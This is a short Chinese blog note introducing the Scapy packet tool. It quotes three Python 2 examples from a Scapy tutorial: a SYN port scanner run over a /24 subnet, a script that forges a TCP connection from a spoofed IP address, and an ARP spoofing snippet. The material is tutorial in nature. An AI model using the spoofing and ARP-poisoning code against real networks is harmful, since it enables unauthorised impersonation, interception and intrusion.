作者介紹,這是個萬能的網絡工具,除了可以查看 TCP/IP 各層的報文,還可以發送報文。可以說是一個萬能工具,作者囂張的說, “it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.”。
項目地址:http://www.secdev.org/projects/scapy/
這里只是做一個簡單的備份,以后有用再做了解。
下面是一個例子,摘自文檔《Ruling the Network with Python》:
#!/usr/bin/env python import sys from scapy import * conf.verb=0 if len(sys.argv) != 2: print "Usage: ./pscan.py <target>" sys.exit(1) target=sys.argv[1] p=IP(dst=target)/TCP(dport=80, flags="S") ans,unans=sr(p, timeout=9) for a in ans: if a[1].flags == 2: print a[1].src
效果是對 IP 段進行 80 端口掃描:
detach@luna:~/lab/scapy-0.9.17$ sudo ./pscan.py 192.168.9.0/24 192.168.9.1 192.168.9.2 192.168.9.11 192.168.9.14
還有這個,偽裝 IP,給遠端地址 TCP 報文(路由器只檢查目的地址是否在自己“派送”范圍),注意,目的地址不能是本地 IP:
#!/usr/bin/env python import sys from scapy import * conf.verb=0 if len(sys.argv) != 4: print "Usage: ./spoof.py <target> <spoofed_ip> <port>" sys.exit(1) target = sys.argv[1] spoofed_ip = sys.argv[2] port = int(sys.argv[3]) p1=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='S') send(p1) print "Okay, SYN sent. Enter the sniffed sequence number now: " seq=sys.stdin.readline() print "Okay, using sequence number " + seq seq=int(seq[:-1]) p2=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='A',ack=seq+1,seq=1) send(p2) print "Okay, final ACK sent. Check netstat on your target :-)"
或許你還用得到 ARP 欺騙:
p = ARP() p.op = 2 p.hwsrc = "00:11:22:aa:bb:cc" p.psrc = spoofed_ip p.hwdst = "ff:ff:ff:ff:ff:ff" p.pdst = target send(p)